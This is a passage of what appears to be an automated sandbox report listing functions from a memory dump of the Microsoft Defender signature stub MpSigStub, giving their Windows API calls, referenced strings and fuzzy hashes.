Function 00007FF7B57DE4C4, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 189registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7B57DE610
RegCloseKey.ADVAPI32 ref: 00007FF7B57DE6B8
RegDeleteValueW.ADVAPI32 ref: 00007FF7B57DE6F3
RegCloseKey.ADVAPI32 ref: 00007FF7B57DE762

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

Strings

DropLocation, xrefs: 00007FF7B57DE66D
-Sigs, xrefs: 00007FF7B57DE553
RecreateCollaborationLocation, xrefs: 00007FF7B57DE6E9, 00007FF7B57DE73D

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$DeleteMessageTraceValue
String ID: -Sigs$DropLocation$RecreateCollaborationLocation
API String ID: 816422069-2320692992
Opcode ID: 3f8bfb16e32abb72a48959d95659c102802360c7bf0141270c4ec42006127991
Instruction ID: 72c3c80b5f1336e3535e381dbc154481aa305ebe1d064e765a6d93df275d7a28
Opcode Fuzzy Hash: 3f8bfb16e32abb72a48959d95659c102802360c7bf0141270c4ec42006127991
Instruction Fuzzy Hash: 68817E61B0864385EE56BB2E94502B9B390AF6AF98F840131DF1D476EFDF3DE4528360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DE798, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B582C844: RegOpenKeyExW.ADVAPI32 ref: 00007FF7B582C877
Part of subcall function 00007FF7B582C844: RegCloseKey.ADVAPI32 ref: 00007FF7B582C8BD

RegCloseKey.ADVAPI32 ref: 00007FF7B57DE80D
RegCloseKey.ADVAPI32 ref: 00007FF7B57DE887
CreateDirectoryW.KERNEL32 ref: 00007FF7B57DE8CA
RegCloseKey.ADVAPI32 ref: 00007FF7B57DE8F0

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

RegCloseKey.ADVAPI32 ref: 00007FF7B57DE943

Strings

SOFTWARE\Microsoft\MpSigStub, xrefs: 00007FF7B57DE7AB
DropLocation, xrefs: 00007FF7B57DE82A

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$CreateDirectoryMessageOpenTrace
String ID: DropLocation$SOFTWARE\Microsoft\MpSigStub
API String ID: 3907378963-3589548979
Opcode ID: b5e4b63c6762ed10407974014d6041a063c67987dd400336c3fdb746acae7d2e
Instruction ID: 7da02ccb0c46bef6788c28378daea48d4dbe845c4e71320db3ab7f5f6c557308
Opcode Fuzzy Hash: b5e4b63c6762ed10407974014d6041a063c67987dd400336c3fdb746acae7d2e
Instruction Fuzzy Hash: 71516C61B0864381EE16BB5EA4102B9A3919F7AF94F881131DF1D876EFDE3DE4428360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5842CE4, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FF7B5842E63
GetProcAddress.KERNEL32 ref: 00007FF7B5842E6F

Strings

api-ms-, xrefs: 00007FF7B5842DAD
ext-ms-, xrefs: 00007FF7B5842DC0

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 06cfbdade2b046be9a14a3622790116a5fc57f4102000b63f52cee65f8f61771
Instruction ID: f4bb3b5c0bbad86238af2fc6ec85cef214a50b099cd67bef61a70f2af7dcdeb8
Opcode Fuzzy Hash: 06cfbdade2b046be9a14a3622790116a5fc57f4102000b63f52cee65f8f61771
Instruction Fuzzy Hash: CA41E621B1960249FA15EB1EA8002B5A391BF66FE0FC48135DF0E4B79EEF3CE4558360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DE330, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 101registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B582C844: RegOpenKeyExW.ADVAPI32 ref: 00007FF7B582C877
Part of subcall function 00007FF7B582C844: RegCloseKey.ADVAPI32 ref: 00007FF7B582C8BD

RegCloseKey.ADVAPI32 ref: 00007FF7B57DE375
RegCloseKey.ADVAPI32 ref: 00007FF7B57DE3CC
RegCloseKey.ADVAPI32 ref: 00007FF7B57DE44A
RegCloseKey.ADVAPI32 ref: 00007FF7B57DE4AA

Strings

SOFTWARE\Microsoft\MpSigStub, xrefs: 00007FF7B57DE345
LastStartTime, xrefs: 00007FF7B57DE3E3
LastExitCode, xrefs: 00007FF7B57DE462

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Open
String ID: LastExitCode$LastStartTime$SOFTWARE\Microsoft\MpSigStub
API String ID: 2976201327-1982340433
Opcode ID: 210548fe0b3b0b1447b8bb12990cab81c0cb091d1e5295de99edcc9d9a30dc83
Instruction ID: 8a060538908f00bce795949e99b24e4a2c95cd80f944ca5dda6963f1453d0eda
Opcode Fuzzy Hash: 210548fe0b3b0b1447b8bb12990cab81c0cb091d1e5295de99edcc9d9a30dc83
Instruction Fuzzy Hash: DF41C361B0864281EB11AB1DE4003B9B790EFAAF84FD80131DF5D876AEDF7DE4858760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57C48D0, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 369COMMON

Download Yara Rule

APIs

EnableTrace.ADVAPI32 ref: 00007FF7B57C4955

Part of subcall function 00007FF7B57C3AC0: TraceMessage.ADVAPI32 ref: 00007FF7B57C3B8B

ControlTraceW.ADVAPI32 ref: 00007FF7B57C4C98

Strings

Etw session %ws stopped., xrefs: 00007FF7B57C4F11
Failed to close etw session %ws(status=%#lx), xrefs: 00007FF7B57C4F22
MpSigStub, xrefs: 00007FF7B57C4C5B, 00007FF7B57C4D47, 00007FF7B57C4D73, 00007FF7B57C4F02
1.1.18500.10, xrefs: 00007FF7B57C4A0B, 00007FF7B57C4E23

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Trace$ControlEnableMessage
String ID: 1.1.18500.10$Etw session %ws stopped.$Failed to close etw session %ws(status=%#lx)$MpSigStub
API String ID: 3707190489-2781843796
Opcode ID: 377ac6751d6ab974fa7c839e0d824ac41d5746978e4a97e5876a7a17d4eb545a
Instruction ID: 7b962034df0b6d372245bfcab0110788397ffcaae5e8ca81f2d4d39ca53ea77c
Opcode Fuzzy Hash: 377ac6751d6ab974fa7c839e0d824ac41d5746978e4a97e5876a7a17d4eb545a
Instruction Fuzzy Hash: 2B12B032A0879189E720EF29E8446ADB7B5FB1AB94F944136DB4C07B6EDF38D451CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57CD50D, Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 345COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B57C4FF4: UuidCreate.RPCRT4 ref: 00007FF7B57C509C

CloseHandle.KERNEL32 ref: 00007FF7B57CDA71
CloseHandle.KERNEL32 ref: 00007FF7B57CDADE
CloseHandle.KERNEL32 ref: 00007FF7B57CDAF6
CloseHandle.KERNEL32 ref: 00007FF7B57CDCB4

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

Strings

Store, xrefs: 00007FF7B57CD6F3
[<, xrefs: 00007FF7B57CEBCC
1.1.18500.10, xrefs: 00007FF7B57CD6E2, 00007FF7B57CD8F5, 00007FF7B57CD9A0

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateMessageTraceUuid
String ID: 1.1.18500.10$Store$[<
API String ID: 2550035614-4021750483
Opcode ID: acdb266dd02b9076fba3e9076d4f64b0d50b277dfa47a982c33fded9503b74fb
Instruction ID: 25edd82131db11ed2479df6fd06df6d7f58f12d38f1af7b29c96e34d9cd14c6b
Opcode Fuzzy Hash: acdb266dd02b9076fba3e9076d4f64b0d50b277dfa47a982c33fded9503b74fb
Instruction Fuzzy Hash: 64024036A0CAC185E660EB18E4407AAF3A4FBAAB50F944135DB9D4376EDF3CE454CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57C4280, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B57C4280: EnumerateTraceGuids.ADVAPI32 ref: 00007FF7B57C3EDD

StartTraceW.ADVAPI32 ref: 00007FF7B57C440F
ControlTraceW.ADVAPI32 ref: 00007FF7B57C442A
StartTraceW.ADVAPI32 ref: 00007FF7B57C4439
EnableTrace.ADVAPI32 ref: 00007FF7B57C4476

Part of subcall function 00007FF7B57C3D10: TraceMessage.ADVAPI32 ref: 00007FF7B57C3D83

Strings

Etw session %ws started., xrefs: 00007FF7B57C4582
MpSigStub, xrefs: 00007FF7B57C42DB, 00007FF7B57C456A, 00007FF7B57C457B

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Trace$Start$ControlEnableEnumerateGuidsMessage
String ID: Etw session %ws started.$MpSigStub
API String ID: 3686664349-154020080
Opcode ID: f9f3fec7534f29ce435babec45c680353224a38acb8fe104fb4df9a735f84cd3
Instruction ID: d389d85252d4fccfa8886c378891ff9c94ef8f7416a94981809a37ad5128c952
Opcode Fuzzy Hash: f9f3fec7534f29ce435babec45c680353224a38acb8fe104fb4df9a735f84cd3
Instruction Fuzzy Hash: D7A1B232B0864586EB10EF2AE4042ADBBA5FB5AB88F800135DB4D5779EDF7CD561C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582EED4, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 174COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000001,?,?,?,?,00007FF7B5830498), ref: 00007FF7B582EF4A

Strings

BCryptCloseAlgorithmProvider, xrefs: 00007FF7B582EF89
bcrypt.dll, xrefs: 00007FF7B582EF54
BCryptGenRandom, xrefs: 00007FF7B582EFA2
RNG, xrefs: 00007FF7B582EFD1
BCryptOpenAlgorithmProvider, xrefs: 00007FF7B582EF70

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: BCryptCloseAlgorithmProvider$BCryptGenRandom$BCryptOpenAlgorithmProvider$RNG$bcrypt.dll
API String ID: 3664257935-748024211
Opcode ID: e968bb6b2103e8bc7657ab39fa118dbd7a768212f778cfbab42c00998dde9cbd
Instruction ID: c4b51973163d90053c74019b3d46d9aa1c603e8ed2d3a949f49cdc24af8ed35b
Opcode Fuzzy Hash: e968bb6b2103e8bc7657ab39fa118dbd7a768212f778cfbab42c00998dde9cbd
Instruction Fuzzy Hash: 3161C762A04A8286EB10AB2ED450179A791BF65F84F844131CF0D8775EDF3EE865C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E10BC, Relevance: 10.6, APIs: 7, Instructions: 75timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00007FF7B57E10E5
SystemTimeToFileTime.KERNEL32 ref: 00007FF7B57E10FB
SetFileTime.KERNEL32 ref: 00007FF7B57E111A
GetLastError.KERNEL32 ref: 00007FF7B57E1136

Part of subcall function 00007FF7B57C7204: TraceMessage.ADVAPI32 ref: 00007FF7B57C7281

GetLastError.KERNEL32 ref: 00007FF7B57E1174
FlushFileBuffers.KERNEL32 ref: 00007FF7B57E119D
GetLastError.KERNEL32 ref: 00007FF7B57E11B9

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$ErrorFileLast$System$BuffersFlushMessageTrace
String ID:
API String ID: 3554365868-0
Opcode ID: a5b1919f3f45466f1122a2f7ceab194b23543f6adc2ca08611bf37896e71be91
Instruction ID: c340ad20cc1e2f51f40ef9d39b6610f43efe92b0b66ee53a2a4cd8b5e8a1ec3d
Opcode Fuzzy Hash: a5b1919f3f45466f1122a2f7ceab194b23543f6adc2ca08611bf37896e71be91
Instruction Fuzzy Hash: 92319331A2864681E740BB1DE8402B9B365EBAAF45F844131DB6E4327ECF3CE495C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B583F840, Relevance: 10.6, APIs: 7, Instructions: 62COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7B583F84F
FlsGetValue.KERNEL32 ref: 00007FF7B583F864
FlsSetValue.KERNEL32 ref: 00007FF7B583F885
FlsSetValue.KERNEL32 ref: 00007FF7B583F8B2
FlsSetValue.KERNEL32 ref: 00007FF7B583F8C3
FlsSetValue.KERNEL32 ref: 00007FF7B583F8D4
SetLastError.KERNEL32 ref: 00007FF7B583F8EF

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 89a4e8f1a30a820bcd677b8368aaaa7a3819a0ccdfd0f95a4158a72907915416
Instruction ID: 3f11b4c709924a5470471592fa45a3a6c31820c35dcb667cb852925df4052355
Opcode Fuzzy Hash: 89a4e8f1a30a820bcd677b8368aaaa7a3819a0ccdfd0f95a4158a72907915416
Instruction Fuzzy Hash: DA216020E0D28285F66DB7695542039E2425F76FB0FC04634EB2E0B6DFDE3CA4A18260

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584AEAC, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7B584AEDD
GetLastError.KERNEL32 ref: 00007FF7B584AEE9
CloseHandle.KERNEL32 ref: 00007FF7B584AF01
CreateFileW.KERNEL32 ref: 00007FF7B584AF2C
WriteConsoleW.KERNEL32 ref: 00007FF7B584AF4B

Strings

CONOUT$, xrefs: 00007FF7B584AF0D

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fa3c8ef6194a9225d20c037ccc1d2aa5b4fa5cc1638bf843d34e7acfedc820f8
Instruction ID: 36048e7e354c8909665e7477ebf3b6abf7d42e098774e0e0c3e429fe772d481e
Opcode Fuzzy Hash: fa3c8ef6194a9225d20c037ccc1d2aa5b4fa5cc1638bf843d34e7acfedc820f8
Instruction Fuzzy Hash: E311B721A18A4186E350AB5AF854335E3A0FBA9FE4F844234EB1E877ADCF7CD4608710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57CD5EE, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7B57CD678
CloseHandle.KERNEL32 ref: 00007FF7B57CDADE

Part of subcall function 00007FF7B57D9FF0: NtSetInformationFile.NTDLL ref: 00007FF7B57DA03D

Strings

Store, xrefs: 00007FF7B57CD6F3
Deleting stale(%ls) %ws, xrefs: 00007FF7B57CD638
[<, xrefs: 00007FF7B57CEBCC
1.1.18500.10, xrefs: 00007FF7B57CD6E2

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$FileInformation
String ID: 1.1.18500.10$Deleting stale(%ls) %ws$Store$[<
API String ID: 454684815-2872536825
Opcode ID: f305057ed341447d3ae8ffe371bbbd95c763354e7b196f9ec8b3e46b74c85a52
Instruction ID: 9e3aa4fb19f5cc5683f2b977ced2c90d89e029b7eddb5bdd4b33a5a363552772
Opcode Fuzzy Hash: f305057ed341447d3ae8ffe371bbbd95c763354e7b196f9ec8b3e46b74c85a52
Instruction Fuzzy Hash: C2416061B0C6C181EA20EB19E4507FAA391FBAAB90F940136DB8D5769FDF3CE591C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B583F9B8, Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7B583F369,?,?,?,?,00007FF7B584ADEA,?,?,00000000,00007FF7B584A223,?,?,?), ref: 00007FF7B583F9C7
FlsSetValue.KERNEL32(?,?,?,00007FF7B583F369,?,?,?,?,00007FF7B584ADEA,?,?,00000000,00007FF7B584A223,?,?,?), ref: 00007FF7B583F9FD
FlsSetValue.KERNEL32(?,?,?,00007FF7B583F369,?,?,?,?,00007FF7B584ADEA,?,?,00000000,00007FF7B584A223,?,?,?), ref: 00007FF7B583FA2A
FlsSetValue.KERNEL32(?,?,?,00007FF7B583F369,?,?,?,?,00007FF7B584ADEA,?,?,00000000,00007FF7B584A223,?,?,?), ref: 00007FF7B583FA3B
FlsSetValue.KERNEL32(?,?,?,00007FF7B583F369,?,?,?,?,00007FF7B584ADEA,?,?,00000000,00007FF7B584A223,?,?,?), ref: 00007FF7B583FA4C
SetLastError.KERNEL32(?,?,?,00007FF7B583F369,?,?,?,?,00007FF7B584ADEA,?,?,00000000,00007FF7B584A223,?,?,?), ref: 00007FF7B583FA67

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f71c4ae612318ad9e8868ea66e24b7d4f2ba82aef035164bde70d80bee626c93
Instruction ID: 0ec19cc04da4931fdf0bc6ff6d2e401f5f2f49a3c6da188aa1dae052754edb6b
Opcode Fuzzy Hash: f71c4ae612318ad9e8868ea66e24b7d4f2ba82aef035164bde70d80bee626c93
Instruction Fuzzy Hash: DE114D20B0D28286FA59B7395551039E2425FB6FB4FD44734EB2E0B7DFEE3CA8614260

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584E25C, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7B584E249,?,?,?,?,00007FF7B584DAC1,?,?,?,?,00007FF7B584BFA6), ref: 00007FF7B584E27B
FlsGetValue.KERNEL32(?,?,?,00007FF7B584E249,?,?,?,?,00007FF7B584DAC1,?,?,?,?,00007FF7B584BFA6), ref: 00007FF7B584E289
SetLastError.KERNEL32(?,?,?,00007FF7B584E249,?,?,?,?,00007FF7B584DAC1,?,?,?,?,00007FF7B584BFA6), ref: 00007FF7B584E306

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: bc77d96ff3f9005244a118c3296419e8d223fd01ba197583bedce79bd4593f51
Instruction ID: d493ca3a2dadd597346f19848dcb234e3beb550737d9ea1da2d14d2ef2d59001
Opcode Fuzzy Hash: bc77d96ff3f9005244a118c3296419e8d223fd01ba197583bedce79bd4593f51
Instruction Fuzzy Hash: 7F118D30A0865286FA54B76DA404035A3917F69FD1F844634DF6E073EEDF3CE561C621

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57C8238, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 178COMMON

Download Yara Rule

Strings

%ws\%ws, xrefs: 00007FF7B57C837F
%ws set to %#lx, xrefs: 00007FF7B57C84AB
Miscellaneous Configuration, xrefs: 00007FF7B57C8274, 00007FF7B57C8371

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %ws set to %#lx$%ws\%ws$Miscellaneous Configuration
API String ID: 0-1772214084
Opcode ID: 46f53146aabc4136b1dafb2060d6df189495db6cb93763dc6fc335fbed929c52
Instruction ID: 8bdad168709aa74ded81b2add8bdddc31c3de20ee5da69db5fc167206a32ef77
Opcode Fuzzy Hash: 46f53146aabc4136b1dafb2060d6df189495db6cb93763dc6fc335fbed929c52
Instruction Fuzzy Hash: FF719022B0864295EB50EF29E8402B9A790FB6AF98F800171DF1D8776EDF3DE545C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5830254, Relevance: 8.9, APIs: 7, Instructions: 101COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF7B582DA31,?,?,?,00007FF7B57CEFBA), ref: 00007FF7B583028E
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00007FF7B582DA31,?,?,?,00007FF7B57CEFBA), ref: 00007FF7B58302A7
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00007FF7B582DA31,?,?,?,00007FF7B57CEFBA), ref: 00007FF7B58302CD
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00007FF7B582DA31,?,?,?,00007FF7B57CEFBA), ref: 00007FF7B58302DB
EnterCriticalSection.KERNEL32 ref: 00007FF7B58302F6
LeaveCriticalSection.KERNEL32 ref: 00007FF7B583032C
LeaveCriticalSection.KERNEL32 ref: 00007FF7B5830397

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: 4dfa4f39c44feb0f674224511d1bd06c1f3d57350f7618f7d2bd4a44b33e1230
Instruction ID: 7e5b5241bad7b5b0eb18fc887840a29f9bede59ac0cd9be8ee946bd98493672a
Opcode Fuzzy Hash: 4dfa4f39c44feb0f674224511d1bd06c1f3d57350f7618f7d2bd4a44b33e1230
Instruction Fuzzy Hash: A3413A20A09A46C2FA01EB1DE454379A3A0BFA6F44F944531DB0D476BEDF3DE9A58360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584454C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7B5844571
GetProcAddress.KERNEL32 ref: 00007FF7B5844587
FreeLibrary.KERNEL32 ref: 00007FF7B58445AE

Strings

CorExitProcess, xrefs: 00007FF7B5844580
mscoree.dll, xrefs: 00007FF7B5844568

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 381a0b8458b779db30d384a644ac36dc085397277a9e0a3e4c76ebab4758a9c9
Instruction ID: a9ab15cd17b44bb2195f6ca351380c590fa11b8eed10eccc1a573739c4fe03e0
